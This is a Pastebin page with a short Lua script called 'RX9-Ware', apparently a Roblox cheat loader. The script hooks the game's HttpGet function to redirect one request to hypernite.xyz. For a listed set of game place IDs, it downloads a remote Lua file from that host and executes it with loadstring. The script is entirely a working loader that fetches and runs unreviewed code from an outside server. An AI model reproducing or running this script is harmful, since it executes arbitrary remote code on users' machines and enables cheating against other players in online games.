Advertisement
pa1nx9

RX9-Ware

Sep 8th, 2021
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. local http;
  2. http = hookfunction(game.HttpGet, function(g,l,...)
  3. if l:find("6W1ZqV53") then
  4. return http(g,"https://hypernite.xyz/Backup/FevoHub/6W1ZqV53",...)
  5. end
  6. return http(g,l,...)
  7. end)
  8.  
  9. local IDs = {
  10. 5073355678, -- [BUG FIX] Project: Beatdown [ALPHA]
  11. 6034188975, -- [NEW FOREST] Attack on Titan: Freedom Awaits [Demo]
  12. 6429245608, -- [SUB SKILLS] Blood Surge // Money Script
  13. 4855457388, -- Demonfall [2.05]
  14. 6839628254, -- unTitled [NEW MUTATIONS]
  15. 286090429 -- Arsenal
  16. }
  17.  
  18. if table.find(IDs, game.PlaceId) then
  19. loadstring(game:HttpGet("https://hypernite.xyz/Backup/FevoHub/"..game.PlaceId..".lua"))()
  20. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement